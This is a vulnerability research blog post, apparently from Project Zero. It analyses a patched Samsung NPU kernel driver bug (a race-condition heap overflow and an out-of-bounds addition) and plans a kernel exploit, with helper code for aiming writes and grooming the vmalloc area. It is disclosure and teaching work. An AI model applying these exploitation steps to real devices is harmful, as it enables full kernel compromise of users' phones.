

An iOS hacker tries Android

Written by Brandon Azad, when working at Project Zero

One of the amazing aspects of working at Project Zero is having the flexibility to direct my own research agenda. My prior work has almost exclusively focused on iOS exploitation, but back in August, I thought it could be interesting to try writing a kernel exploit for Android to see how it compares. I have two aims for this blog post: First, I will walk you through my full journey from bug description to kernel read/write/execute on the Samsung Galaxy S10, starting from the perspective of a pure-iOS security researcher. Second, I will try to emphasize some of the major security/exploitation differences between the two platforms that I have observed.

You can find the fully-commented exploit code attached in issue 2073.

In November 2020, Samsung released a patch addressing the issue for devices that are eligible to receive security updates. This issue was assigned CVE-2020-28343 and a Samsung-specific SVE-2020-18610.

The initial vulnerability report

In early August, fellow Google Project Zero researcher Ben Hawkes reported several vulnerabilities in the Samsung Neural Processing Unit (NPU) kernel driver due to a complete lack of input sanitization. At a high level, the NPU is a coprocessor dedicated to machine learning and neural network computations, especially for visual processing. The bugs Ben found were in Samsung's Android kernel driver for the NPU, responsible (among other things) for sending neural models from an Android app in userspace over to the NPU coprocessor.

The following few sections will look at the vulnerabilities. These bugs aren't actually that interesting: they are quite ordinary out-of-bounds writes due to unsanitized input, and could almost be treated as black-box primitives for the purposes of writing an exploit (which was my ultimate goal). The primitives are quite strong and, to my knowledge, no novel techniques are required to build a practical exploit out of them. However, since I was coming from the perspective of never having written a Linux kernel exploit, understanding these bugs and their constraints in detail was crucial for me to begin to visualize how they might be used to gain kernel read/write.

🤖 📱 🧠 👓 🐛🐛

The vulnerabilities are reached by opening a handle to the device /dev/vertex10, which Ben had determined is accessible to a normal Android app. Calling open() on this device causes the kernel to allocate and initialize a new npu_session object that gets associated with the returned file descriptor. The process can then invoke ioctl() on the file descriptor to interact with the session. For example, consider the following code:

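// Opening the device allocates a new npu_session tied to this file descriptor.
int ncp_fd = open("/dev/vertex10", O_RDONLY);
struct vs4l_graph vs4l_graph = /* ioctl data */;
// Reaches npu_vertex_s_graph() -> npu_session_s_graph() in the kernel.
ioctl(ncp_fd, VS4L_VERTEXIOC_S_GRAPH, &vs4l_graph);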

The preceding syscalls will result in the kernel calling the function npu_vertex_s_graph(), which calls npu_session_s_graph() on the associated npu_session (see drivers/vision/npu/npu-vertex.c). npu_session_s_graph() then calls __config_session_info() to parse the input data to this ioctl (see npu-session.c):

int __config_session_info(struct npu_session *session)
{
    ...
    ret = __pilot_parsing_ncp(session, &temp_IFM_cnt, &temp_OFM_cnt, &temp_IMB_cnt, &WGT_cnt);

    temp_IFM_av = kcalloc(temp_IFM_cnt, sizeof(struct temp_av), GFP_KERNEL);
    temp_OFM_av = kcalloc(temp_OFM_cnt, sizeof(struct temp_av), GFP_KERNEL);
    temp_IMB_av = kcalloc(temp_IMB_cnt, sizeof(struct temp_av), GFP_KERNEL);
    ...

    ret = __second_parsing_ncp(session, &temp_IFM_av, &temp_OFM_av, &temp_IMB_av, &WGT_av);
    ...
}

As can be seen above, __config_session_info() calls two other functions to perform the actual parsing of the input: __pilot_parsing_ncp() and __second_parsing_ncp(). As their names suggest, __pilot_parsing_ncp() performs a preliminary "pilot" parsing of the input data in order to compute the sizes of a few arrays that will need to be allocated for the full parsing; meanwhile, __second_parsing_ncp() performs the full parsing, populating the arrays that were just allocated.

Let's take a quick look at __pilot_parsing_ncp():

int __pilot_parsing_ncp(struct npu_session *session, u32 *IFM_cnt, u32 *OFM_cnt, u32 *IMB_cnt, u32 *WGT_cnt)
{
    ...
    ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;
    ncp = (struct ncp_header *)ncp_vaddr;
    memory_vector_offset = ncp->memory_vector_offset;
    memory_vector_cnt = ncp->memory_vector_cnt;
    mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);

    for (i = 0; i < memory_vector_cnt; i++) {
        u32 memory_type = (mv + i)->type;

        switch (memory_type) {
        case MEMORY_TYPE_IN_FMAP:
            {
                (*IFM_cnt)++;
                break;
            }
        case MEMORY_TYPE_OT_FMAP:
            {
                (*OFM_cnt)++;
                break;
            }
        ...
        }
    }

    return ret;
}

There are a few things to note here.

First, the input data is being parsed from a buffer pointed to by the field session->ncp_mem_buf->vaddr. This turns out to be an ION buffer, which is a type of memory buffer shareable between userspace, the kernel, and coprocessors. The ION interface was introduced by Google into the Android kernel to facilitate allocating device-accessible memory and sharing that memory with various hardware components, all without needing to copy the data between buffers. In this case, the userspace app will initialize the model directly inside an ION buffer, and then the model will be mapped directly into the kernel for pre-processing before the ION buffer's device address is sent to the NPU to perform the actual work.

The important takeaway from this first observation is that the session->ncp_mem_buf->vaddr field points to an ION buffer that is currently mapped into both userspace and the kernel: that is, it's shared memory.

The second thing to note in the function __pilot_parsing_ncp() is that the only thing it does is count the number of times each type of element appears in the memory_vector array in the shared ION buffer. Each memory_vector element has an associated type, and this function simply tallies up the number of times it sees each type, and nothing else. There isn't even a failure case for this function.

This is interesting for a few reasons. For one, there's no input sanitization to ensure that memory_vector_cnt (which is read directly from the shared memory buffer and thus is attacker-controlled) is a sane value. It could be 0xffffffff, leading the for loop to process memory_vector elements off the end of the ION buffer. Probably a kernel crash at worst, but it's certainly an indication of unfuzzed code.

More importantly, since only the count of each type is stored, it seems likely that this code is setting itself up for a double-read, time-of-check-to-time-of-use (TOCTOU) issue when it later processes the memory_vectors a second time. Each of the returned counts is used to allocate an array in kernel memory (see __config_session_info()). But because the memory_vector_cnt and types reside in shared memory, they could be changed by code running in userspace between __pilot_parsing_ncp() and __second_parsing_ncp(), meaning that the second function is passed incorrectly sized arrays for the memory_vector data it eventually sees in the shared buffer.

Of course, to determine whether this is actually a bug, we have to look at the implementation of __second_parsing_ncp():

int __second_parsing_ncp(
    struct npu_session *session,
    struct temp_av **temp_IFM_av, struct temp_av **temp_OFM_av,
    struct temp_av **temp_IMB_av, struct addr_info **WGT_av)
{
    ...
    ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;
    ncp_daddr = session->ncp_mem_buf->daddr;
    ncp = (struct ncp_header *)ncp_vaddr;
    address_vector_offset = ncp->address_vector_offset;
    address_vector_cnt = ncp->address_vector_cnt;
    ...
    memory_vector_offset = ncp->memory_vector_offset;
    memory_vector_cnt = ncp->memory_vector_cnt;
    mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);
    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);
    ...
    for (i = 0; i < memory_vector_cnt; i++) {
        u32 memory_type = (mv + i)->type;
        u32 address_vector_index;
        u32 weight_offset;

        switch (memory_type) {
        case MEMORY_TYPE_IN_FMAP:
            {
                address_vector_index = (mv + i)->address_vector_index;
                if (!EVER_FIND_FM(IFM_cnt, *temp_IFM_av, address_vector_index)) {
                    (*temp_IFM_av + (*IFM_cnt))->index = address_vector_index;
                    (*temp_IFM_av + (*IFM_cnt))->size = (av + address_vector_index)->size;
                    (*temp_IFM_av + (*IFM_cnt))->pixel_format = (mv + i)->pixel_format;
                    (*temp_IFM_av + (*IFM_cnt))->width = (mv + i)->width;
                    (*temp_IFM_av + (*IFM_cnt))->height = (mv + i)->height;
                    (*temp_IFM_av + (*IFM_cnt))->channels = (mv + i)->channels;
                    (mv + i)->stride = 0;
                    (*temp_IFM_av + (*IFM_cnt))->stride = (mv + i)->stride;
                    (*IFM_cnt)++;
                }
                break;
            }
        ...
        case MEMORY_TYPE_WEIGHT:
            {
                // update address vector, m_addr with ncp_alloc_daddr + offset
                address_vector_index = (mv + i)->address_vector_index;
                weight_offset = (av + address_vector_index)->m_addr;
                if (weight_offset > (u32)session->ncp_mem_buf->size) {
                    ret = -EINVAL;
                    npu_uerr("weight_offset is invalid, offset(0x%x), ncp_daddr(0x%x)\n",
                        session, (u32)weight_offset, (u32)session->ncp_mem_buf->size);
                    goto p_err;
                }
                (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;
                ...
                break;
            }
        ...
        }
    }
    ...
}

Once again, there are several things to note here.

First off, it does indeed turn out that memory_vector_cnt is read a second time from the shared ION buffer, and there are no sanity checks to ensure that the arrays temp_IFM_av, temp_OFM_av, and temp_IMB_av are not filled beyond the counts for which they were each allocated. So this is indeed a linear heap overflow bug.

But secondly, when processing a memory_vector element of type MEMORY_TYPE_WEIGHT, it appears that there's another issue as well: A controlled 32-bit value address_vector_index is read from the memory_vector entry and used as an index into an address_vector array without any bounds checks. And not only is the out-of-bounds address_vector's m_addr field read, it's also written a few lines later after adding in the ION buffer's device address! So this is an out-of-bounds addition at a controlled offset.

These are the two most serious issues described in Ben's report to Samsung. We'll look at each in more detail in the following two sections in order to understand their constraints.

The heap overflow

How might the heap overflow be triggered?

First, __config_session_info() will call __pilot_parsing_ncp() to count the number of elements of each type in the memory_vector array in the shared ION buffer. Imagine that initially the value of ncp->memory_vector_cnt is 1, and the single memory_vector has type MEMORY_TYPE_IN_FMAP. Then __pilot_parsing_ncp() will return with IFM_cnt set to 1.

Next, __config_session_info() will allocate the temp_IFM_av with space for a single temp_av element.

Concurrently, a thread in userspace will race to change the value of ncp->memory_vector_cnt in the shared ION buffer from 1 to 100. The memory_vector now appears to have 100 elements, and userspace will ensure that the extra elements all have type MEMORY_TYPE_IN_FMAP as well.

Back in the kernel: After allocating the arrays, __config_session_info() will call __second_parsing_ncp() to perform the second stage of parsing. __second_parsing_ncp() will read memory_vector_cnt again, this time getting the value 100. Thus, in the for loop, it will try to process 100 elements from the memory_vector array, and each will be of type MEMORY_TYPE_IN_FMAP. Each iteration will populate another temp_av element in the temp_IFM_av array, and elements after the first will be written off the end of the array.
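The race can be modeled in a few lines of userspace C. This is a minimal sketch, not driver code: `toy_ncp_header`, `race_hook_fn`, `count_overflow_writes()`, and `grow_to_100()` are hypothetical names, the hook stands in for the racing userspace thread, and the model only counts how many element writes would land past the allocation instead of performing them.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Toy stand-in for the shared ION buffer header: only the field that the
 * driver fetches twice. volatile because another thread may change it. */
struct toy_ncp_header {
    volatile uint32_t memory_vector_cnt;
};

/* Hypothetical hook representing the racing userspace thread. It runs
 * between the two passes and may rewrite the shared header. */
typedef void (*race_hook_fn)(struct toy_ncp_header *hdr);

/* Returns how many element writes the second pass would perform past the
 * end of an array sized by the first pass. Nothing is actually written;
 * the model only counts. */
static uint32_t count_overflow_writes(struct toy_ncp_header *hdr,
                                      race_hook_fn hook)
{
    assert(hdr != NULL);

    /* First fetch (pilot pass): sizes the kcalloc()'d array. */
    uint32_t allocated = hdr->memory_vector_cnt;

    if (hook != NULL)
        hook(hdr);

    /* Second fetch: drives the fill loop with no check against
     * `allocated`, as in __second_parsing_ncp(). */
    uint32_t filled = hdr->memory_vector_cnt;

    uint32_t out_of_bounds = 0;
    for (uint32_t i = 0; i < filled; i++) {
        if (i >= allocated)      /* element i would land past the array */
            out_of_bounds++;
    }
    return out_of_bounds;
}

/* Example hook: the count grows from 1 to 100 between the passes. */
static void grow_to_100(struct toy_ncp_header *hdr)
{
    hdr->memory_vector_cnt = 100;
}
```

With the 1 to 100 flip described above, the model reports 99 out-of-bounds element writes; without the hook it reports none.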

Furthermore, the out-of-bounds temp_av element's fields are written with contents read from the ION buffer, which means that the contents of the out-of-bounds write can be fully controlled (except for padding between fields).

This seems like an excellent primitive: we're performing an out-of-bounds write off the end of a kernel allocation of controlled size, and we can control both the size of the overflow and the contents of the data we write. This level of control means that it should theoretically be possible to place the temp_IFM_av allocation next to many different types of objects and control the amount of the victim object we overflow. Having such flexibility means that we can choose from a very wide selection of victim objects when deciding the easiest and most reliable exploit strategy.

The one thing to be aware of is that a simple implementation would probably win the race to increase memory_vector_cnt about 25% of the time. The reason for this is that it's probably tricky to get the timing of when to flip from 1 to 100 exactly right, so the simplest strategy is to have a user thread alternate between the two values continuously. If each of the reads in __pilot_parsing_ncp() and __second_parsing_ncp() reads either 1 or 100 randomly, then there's a 1 in 4 chance that the first read is 1 and the second is 100. The good thing is that nothing too bad happens if we lose the race: there's possibly a memory leak, but the kernel doesn't crash. Thus, we can just try this over and over until we win.
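The 1-in-4 estimate follows from treating each of the two reads as an independent coin flip between the two values. The sketch below (hypothetical helper names) enumerates the four outcomes and, assuming attempts are independent and losing is harmless, computes the expected number of attempts until a win as the mean of a geometric distribution.

```c
#include <assert.h>
#include <stdint.h>

/* Enumerates the four (pilot read, second read) outcomes, assuming each
 * read independently sees `small` or `large` with probability 1/2, and
 * counts the winning ones: pilot sees `small`, second pass sees `large`. */
static void race_outcomes(uint32_t small, uint32_t large,
                          unsigned *wins, unsigned *total)
{
    const uint32_t seen[2] = { small, large };

    *wins = 0;
    *total = 0;
    for (int first = 0; first < 2; first++) {
        for (int second = 0; second < 2; second++) {
            (*total)++;
            if (seen[first] == small && seen[second] == large)
                (*wins)++;
        }
    }
}

/* Expected attempts until the first win: mean of a geometric distribution
 * with success probability wins / total. */
static double expected_attempts(unsigned wins, unsigned total)
{
    assert(wins > 0 && total >= wins);
    return (double)total / (double)wins;
}
```

For the values 1 and 100 this gives one winning outcome out of four, so on average about four attempts are needed.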

The out-of-bounds addition

Now that we've seen the heap overflow, let's look at the out-of-bounds addition primitive. Unlike the prior primitive, this one is a straightforward, deterministic out-of-bounds addition.

Once again, we'll initialize our ION buffer to have a single memory_vector element, but this time its type will be MEMORY_TYPE_WEIGHT. Nothing interesting happens in __pilot_parsing_ncp(), so we'll jump ahead to __second_parsing_ncp().

In __second_parsing_ncp(), address_vector_offset is read directly from the ION buffer without input validation. This is added to the ION buffer address to compute the address of an array of address_vector structs; since the offset was unchecked, this supposed address_vector array could lie entirely in out-of-bounds memory. And importantly, there are no alignment checks, so the address_vector array could start at any odd unaligned address we want.

    address_vector_offset = ncp->address_vector_offset;
    ...
    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);

We next enter the for loop to process the single memory_vector entry, and jump to the case for MEMORY_TYPE_WEIGHT. This code reads the address_vector_index field of the memory_vector, which is again completely controlled and unvalidated. The (potentially out-of-bounds) address_vector element at the specified index is then accessed.

    // update address vector, m_addr with ncp_alloc_daddr + offset
    address_vector_index = (mv + i)->address_vector_index;
    weight_offset = (av + address_vector_index)->m_addr;

Reading the m_addr field (at offset 0x4 in address_vector) will thus possibly perform an out-of-bounds read.
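Because neither address_vector_offset nor address_vector_index is validated, the 32-bit field that gets read (and later written) sits at ncp_vaddr + address_vector_offset + address_vector_index * sizeof(struct address_vector) + 4. The sketch below computes that byte offset and solves for an offset that hits a chosen target. It assumes a hypothetical 16-byte layout for struct address_vector (four u32 fields); only the 0x4 offset of m_addr comes from the text above, and the function names are illustrative.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical layout: four 32-bit fields, 16 bytes total. Only the 0x4
 * offset of m_addr is taken from the text; the rest is assumed. */
struct address_vector_model {
    uint32_t index;
    uint32_t m_addr;
    uint32_t s_addr;
    uint32_t size;
};

/* Byte offset from ncp_vaddr of the m_addr field that the WEIGHT case
 * reads and then overwrites. 64-bit math, since index * 16 can exceed
 * 32 bits. */
static uint64_t m_addr_target_offset(uint32_t av_offset, uint32_t av_index)
{
    return (uint64_t)av_offset
         + (uint64_t)av_index * sizeof(struct address_vector_model)
         + offsetof(struct address_vector_model, m_addr);
}

/* Solves for an address_vector_offset that, with index 0, makes m_addr
 * land exactly on `target` (a byte offset from ncp_vaddr). No alignment is
 * needed because the driver performs no alignment check. Returns 0 on
 * success, -1 if the target is out of reach with index 0. */
static int solve_av_offset(uint64_t target, uint32_t *av_offset)
{
    const uint64_t m_off = offsetof(struct address_vector_model, m_addr);

    assert(av_offset != NULL);
    if (target < m_off || target - m_off > UINT32_MAX)
        return -1;
    *av_offset = (uint32_t)(target - m_off);
    return 0;
}
```

For example, an odd target offset such as 0x101003 is reached with address_vector_offset = 0x100fff and index 0, which is only possible because the driver never checks alignment.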

But there's a check we need to pass before we can hit the out-of-bounds write:

    if (weight_offset > (u32)session->ncp_mem_buf->size) {
        ret = -EINVAL;
        npu_uerr("weight_offset is invalid, offset(0x%x), ncp_daddr(0x%x)\n",
            session, (u32)weight_offset, (u32)session->ncp_mem_buf->size);
        goto p_err;
    }

Basically, what this does is compare the original value of the out-of-bounds read to the size of the ION buffer, and if the original value is greater than the ION buffer size, then __second_parsing_ncp() aborts without performing the write.

But, assuming that the original value is less than the ION buffer size, it gets updated by adding in the device address (daddr) of the ION buffer:

    (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;

The device address is (presumably) the address at which a device could access the buffer; this could be a physical address, or if the system has an IOMMU in front of the hardware device performing the access, it would be an IOMMU-translated address. Essentially, this code expects that the m_addr field in the address_vector will initially be an offset from the start of the ION buffer, and it updates it into an absolute (device) address by adding the ION buffer's daddr.

So, if the original value at the out-of-bounds addition location is quite small, and in particular smaller than the ION buffer size, then this primitive will allow us to add in the ION buffer's daddr, making the value rather large instead.

"Hey Siri, how do I exploit Android?"

Everything described up to here comes more or less directly from Ben's initial report to Samsung. So: what now?

Even after reading Ben's initial report and looking at the NPU driver's source code to understand the bugs more fully, I felt rather lost as to how to proceed. As the title and intro to this post suggest, Android is not my area.

On the other hand, I have written a few iOS kernel exploits for memory corruption bugs before. Based on that experience, I suspected that both the heap overflow and the out-of-bounds addition could be exploited using straightforward applications of existing techniques, had the bugs existed on iOS. So I embarked on a thought experiment: what would the full exploit flows for each of these primitives be if the bugs existed on iOS instead of Android? My hope was that I might be able to draw parallels between the two, such that thinking about the exploit on iOS would inform how these bugs could be exploited on Android.

Thought experiment: an iOS heap overflow

So, imagine that an equivalent to the heap overflow bug existed on iOS; that is, imagine there were a race with a 25% win rate that allowed us to perform a fully controlled linear heap buffer overflow out of a controlled-size allocation. How could we turn this into arbitrary kernel read/write?

On iOS, the de-facto standard for a final kernel read/write capability has been the use of an object called a kernel task port. A task port is a handle that gives us control over the virtual memory of a task, and a kernel task port is a task port for the kernel itself. Thus, if you can construct a kernel task port, you can use standard APIs like mach_vm_read() and mach_vm_write() to read and write kernel memory from userspace.

Comparing this heap overflow to the vulnerabilities listed in the survey of iOS kernel exploits, the initial primitive is most similar to that granted by CVE-2017-2370, which was exploited by extra_recipe and Yalu102. Thus, the exploit flow would likely be quite similar to those existing iOS exploits. And to make our thought experiment even easier, we can put aside any concern about reliability and just imagine the simplest exploit flow that could work generically.

The most straightforward way to get a handle to a kernel task port using this primitive would likely be to overflow into an out-of-line Mach ports array and insert a pointer to a fake kernel task port, such that receiving the overflowed port array back in userspace grants us a handle to our fake port. This is essentially the strategy used by Yalu102, except that that exploit relies on the absence of PAN (i.e., it relies on being able to dereference userspace pointers from kernel mode). The same strategy should work on systems with PAN; it would just require a few extra steps.

Unfortunately, the first time we trigger the vulnerability to give ourselves a handle to a fake task port, we won't have all the information needed to immediately construct a kernel task port: we'd need to leak the addresses of a few important kernel objects, such as the kernel_map, first. Consequently, we would need to start by giving ourselves a "vanilla" fake task port and then use that to read arbitrary kernel memory via the traditional pid_for_task() technique. Once we can read kernel memory, we would locate the relevant kernel objects to build the final kernel task port.

Now, since we'll need to perform multiple arbitrary reads using pid_for_task(), we need to be able to update the kernel address we want to read from. This can be a challenge because the pointer specifying the target read address lives in kernel memory. Fortunately, there already exist a few standard techniques for updating this pointer to read from new kernel addresses, such as reallocating the buffer holding the target read pointer (see the Chaos exploit), overlapping Mach ports in special ways that allow updating the target read address directly (see the v0rtex exploit), or placing the fake kernel objects in user/kernel shared memory (see the oob_timestamp exploit).

Finally, there will also be some complications from working around Apple's zone_require mitigation, which aims to block exactly these types of fake Mach port shenanigans. However, at least through iOS 13.3, it's possible to get around zone_require by operating with large allocations that live outside the zone_map (see the oob_timestamp exploit).

So, in summary, a very simplistic exploit flow for the heap overflow might look something like this:

  1. Spray large amounts of kernel memory with fake task ports and fake tasks, such that you can be reasonably sure that one fake object of each type has been sprayed to a specific hardcoded address. Use the oob_timestamp trick to bypass zone_require and place these fake objects in shared memory.
  2. Spray out-of-line Mach ports allocations, and poke holes between the allocations.
  3. Trigger the out-of-bounds write out of an allocation of the same size as the out-of-line Mach ports allocations, overflowing into the subsequent array of Mach ports and inserting the hardcoded pointer to the fake ports.
  4. Receive the out-of-line Mach port handles in userspace and check if there's a new task port handle; if not, go back to step 2.
  5. This handle is a fake task port that can be used to read kernel memory using pid_for_task(). Use this capability to find relevant kernel objects and update the fake task into a fake kernel task object.

Thought experiment: an iOS out-of-bounds addition

What about the out-of-bounds addition?

None of the bugs in the survey of iOS kernel exploits seem like a good comparison point: the most similar category would be linear heap buffer overflows, but these are much more limiting due to spatial locality. Nonetheless, I eventually settled on oob_timestamp as the best reference.

The vulnerability used by oob_timestamp is CVE-2020-3837, a linear heap out-of-bounds write of up to 8 bytes of timestamp data. However, this isn't the typical heap buffer overflow. Most heap overflows occur in small to medium sized allocations of up to 2 pages (0x8000 bytes); these allocations occur in a submap of the kernel virtual address space called the zone_map. Meanwhile, the out-of-bounds write in oob_timestamp occurs off the end of a pageable region of shared memory outside the zone_map, in the general kernel_map used for large, multi-page allocations or allocations with special properties (like pageable and shared memory).

The basic flow of oob_timestamp is as follows:

  1. Groom the kernel_map to allocate the pageable shared memory region, an ipc_kmsg, and an out-of-line Mach ports array contiguously. These are followed by a large number of filler allocations.
  2. Trigger the overflow to overwrite the first few bytes of the ipc_kmsg, increasing the size field.
  3. Free the ipc_kmsg, causing the subsequent out-of-line Mach ports array to also be freed.
  4. Reallocate the out-of-line Mach ports array with controlled data, effectively inserting fake Mach port pointers into the array. The pointer will be a pointer to a fake task port in the pageable shared memory region.
  5. Receive the out-of-line Mach ports in userspace, gaining a handle to the fake port.
  6. Overwrite the fake port in shared memory to make a fake task port and then read kernel memory using pid_for_task(). Find relevant kernel objects and update the fake task into a fake kernel task.

My thought was that you could basically use the out-of-bounds addition primitive as a drop-in replacement for the out-of-bounds timestamp write primitive in oob_timestamp. This seemed sensible because the initial primitive in oob_timestamp is only used to increase the size of an ipc_kmsg so that extra memory gets freed. Since all I needed to do was bump an ipc_kmsg's size field, I felt that an out-of-bounds addition primitive should surely be suitable for this.

As it turns out, the constraints of the out-of-bounds addition are actually much tighter than I had imagined: the ipc_kmsg's size and the ION buffer's device address would need to be very carefully chosen to meet all the requirements. In spite of this oversight, oob_timestamp still proved a useful reference point for another reason: where the ION buffers get mapped in kernel memory.

Like iOS, Android also has multiple areas of virtual memory in which allocations can be made. kmalloc() is the standard allocation function used for most allocations. It's somewhat analogous to allocating using kalloc() on iOS: allocations can be less than a page in size and are managed via a dedicated allocation pool that's a bit like the zone_map. However, there's also a vmalloc() function for allocating "virtually contiguous memory". Unlike kmalloc(), vmalloc() allocates at page granularity and allocations occur in a separate region of kernel virtual memory somewhat analogous to the kernel_map on iOS.

The reason this matters is that the ION buffer on Android is mapped into the Linux kernel's vmalloc region. Thus, the fact that the out-of-bounds addition occurs off the end of a shared ION buffer mapped in the vmalloc area closely parallels how the oob_timestamp overflow occurs off the end of a pageable shared memory region in the kernel_map.

Choosing a path

At this point I still faced many unknowns: What allocation and heap shaping primitives were available on Android? What types of objects would be useful to corrupt? What would be Android's equivalent of the kernel task port, the final read/write capability? I had no idea.

One thing I did have was a hint at a good starting point: Both Ben and fellow Project Zero researcher Jann Horn had pointed out that along with the ION buffers, kernel thread stacks were also allocated in the vmalloc area, which meant that kernel stacks might be a good target for the out-of-bounds addition bug.

A diagram showing an ION buffer mapped directly before a userspace thread's kernel stack, with a guard page in between. The address_vector_offset is so large that it points past the end of the ION buffer and into the stack.

If the ION buffer is mapped directly before a kernel stack for a userspace thread, then the out-of-bounds addition primitive could be used to manipulate the stack.

Imagine that we could get a kernel stack for a thread in our process allocated at a fixed offset after the ION buffer. The out-of-bounds addition primitive would let us manipulate values on the thread's stack during a syscall by adding in the ION buffer's daddr, assuming that the initial values were sufficiently small. For example, we might make a blocking syscall which saves a certain size parameter in a variable, and once that syscall blocks and spills the size variable to the stack, we can use the out-of-bounds addition to make it very large; unblocking the syscall would then cause the original code to resume and use the corrupted size value, perhaps passing it to a function like memcpy() to cause further memory corruption.

Using the out-of-bounds addition primitive to target values on a thread's kernel stack was appealing for one very important reason: in theory, this technique could dramatically reduce the amount of Linux-specific knowledge I'd need to develop a full exploit.

Most typical memory corruption exploits require finding specific objects that are interesting targets for corruption. For example, there are very few objects that could replace the ipc_kmsg in the oob_timestamp exploit, because the exploit relies on corrupting a size field stored at the very start of the struct; not many other objects have a size as their first field. So ipc_kmsg fills a very important niche in the arsenal of interesting objects to target with memory corruption, just as Mach ports fill a niche in useful objects to get a fake handle for.

Undoubtedly, there's a similar arsenal of useful objects to target for Android kernel exploitation. But by limiting ourselves to corrupting values on the kernel stack, we transform the set of all useful target "objects" into the set of useful stack frames to manipulate. This is a much easier set of target objects to work with than the set of all structs that could be allocated after the ION buffer because it doesn't require much Linux-specific knowledge to reason about semantics: We only need to identify relevant syscalls and look at the kernel binary in a disassembler to get a handle on what "objects" we have available to us.

Selecting the out-of-bounds addition primitive and choosing to target kernel thread stacks effectively solves the problem of finding useful kernel objects to corrupt by turning what would be a codebase-wide search into a simple enumeration of interesting stack frames in a disassembler without needing to learn much in the way of Linux internals.

Nevertheless, we are still left with two pressing questions: What allocation and heap shaping primitives do we have on Android? And what will be our final read/write capability to parallel the kernel task port?

Heap shaping

I started with the heap shaping primitive since it seemed the more tangible problem.

As previously mentioned, the vmalloc area is a region of the kernel's virtual address space in which allocations and mappings of page-level granularity can be made, comparable to the kernel_map on iOS. And just like how iOS provides a means of inspecting virtual memory regions in the kernel_map via vmmap, Linux provides a way of inspecting the allocations in the vmalloc area through /proc/vmallocinfo.

The /proc/vmallocinfo interface provides a simple textual description of each allocated virtual memory region inside the vmalloc area, including the start and end addresses, the size of the region in bytes, and some information about the allocation, such as the allocation site:

0xffffff8013bd0000-0xffffff8013bd5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8013bd8000-0xffffff8013bdd000   20480 unpurged vm_area
0xffffff8013be0000-0xffffff8013be5000   20480 unpurged vm_area
0xffffff8013be8000-0xffffff8013bed000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8013bed000-0xffffff8013cec000 1044480 binder_alloc_mmap_handler+0xa4/0x1e0 vmalloc
0xffffff8013cec000-0xffffff8013eed000 2101248 ion_heap_map_kernel+0x110/0x16c vmap
0xffffff8013eed000-0xffffff8013fee000 1052672 ion_heap_map_kernel+0x110/0x16c vmap
0xffffff8013ff0000-0xffffff8013ff5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc
0xffffff8013ff8000-0xffffff8013ffd000   20480 unpurged vm_area
0xffffff8014000000-0xffffff80140ff000 1044480 binder_alloc_mmap_handler+0xa4/0x1e0 vmalloc
0xffffff8014108000-0xffffff801410d000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

This gives us a way to visualize the vmalloc area and ensure that our allocations are grooming the heap as we want them to.
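When grooming, it can help to check vmallocinfo output mechanically rather than by eye. The sketch below parses lines in the format shown above with sscanf() and counts ION mappings (allocation site ion_heap_map_kernel) that are followed, within a chosen gap, by what looks like a kernel stack (allocation site _do_fork). The helper names are hypothetical, the two allocation-site prefixes are assumptions taken from this particular listing and are kernel-version specific, and the code works on text you have already captured rather than opening /proc/vmallocinfo itself.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

struct vm_region {
    unsigned long long start, end, size;
    char caller[64];
};

/* Parses "0xSTART-0xEND SIZE CALLER ..." as printed by /proc/vmallocinfo.
 * Returns 1 on success, 0 if the line does not match. */
static int parse_vmallocinfo_line(const char *line, struct vm_region *r)
{
    return sscanf(line, "%llx-%llx %llu %63s",
                  &r->start, &r->end, &r->size, r->caller) == 4;
}

/* Allocation-site prefixes taken from the sample listing. */
static int is_kernel_stack(const struct vm_region *r)
{
    return strncmp(r->caller, "_do_fork+", strlen("_do_fork+")) == 0;
}

static int is_ion_mapping(const struct vm_region *r)
{
    return strncmp(r->caller, "ion_heap_map_kernel+",
                   strlen("ion_heap_map_kernel+")) == 0;
}

/* Counts ION mappings that are immediately followed (in address order, as
 * vmallocinfo lists them) by a kernel stack starting at most `max_gap`
 * bytes after the end of the mapping. */
static int count_ion_followed_by_stack(const char *const *lines, int n,
                                       unsigned long long max_gap)
{
    struct vm_region prev = {0}, cur = {0};
    int have_prev = 0, hits = 0;

    assert(lines != NULL || n == 0);
    for (int i = 0; i < n; i++) {
        if (!parse_vmallocinfo_line(lines[i], &cur))
            continue;
        if (have_prev && is_ion_mapping(&prev) && is_kernel_stack(&cur) &&
            cur.start >= prev.end && cur.start - prev.end <= max_gap)
            hits++;
        prev = cur;
        have_prev = 1;
    }
    return hits;
}
```

On the listing above, the second ION mapping ends at 0xffffff8013fee000 and the next stack starts at 0xffffff8013ff0000, so that pair only counts if a gap of 0x2000 bytes is allowed.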

Our heap shaping needs to place a kernel thread stack at a fixed offset after the ION buffer mapping. By inspecting the kernel source code and the vmallocinfo output, I determined that each kernel stack consists of 4 pages (0x4000 bytes) of data followed by a guard page, and that the guard page is counted in the region's size; this is why the _do_fork entries above are 0x5000 (20480) bytes. Thus, my initial heap shaping idea was:

  1. Make a large allocation of, say, 0x80000 bytes.
  2. Spray kernel stacks by creating new threads to fill up all 0x5000-byte holes in the vmalloc area before our large 0x80000-byte allocation.
  3. Free the large allocation. This should make an 0x80000-byte hole with no 0x5000-byte holes before it.
  4. Spray several more kernel stacks by creating new threads; these stacks should fall into the beginning of the hole, and also fill any earlier holes created by exiting threads from other processes.
  5. Map the ION buffer into the kernel by invoking the VS4L_VERTEXIOC_S_GRAPH ioctl, but without triggering the out-of-bounds addition. The ION buffer mapping should also fall into the hole.
  6. Spray more kernel stacks by creating new threads. These should fall into the hole as well, and one of them should land directly after the ION buffer.

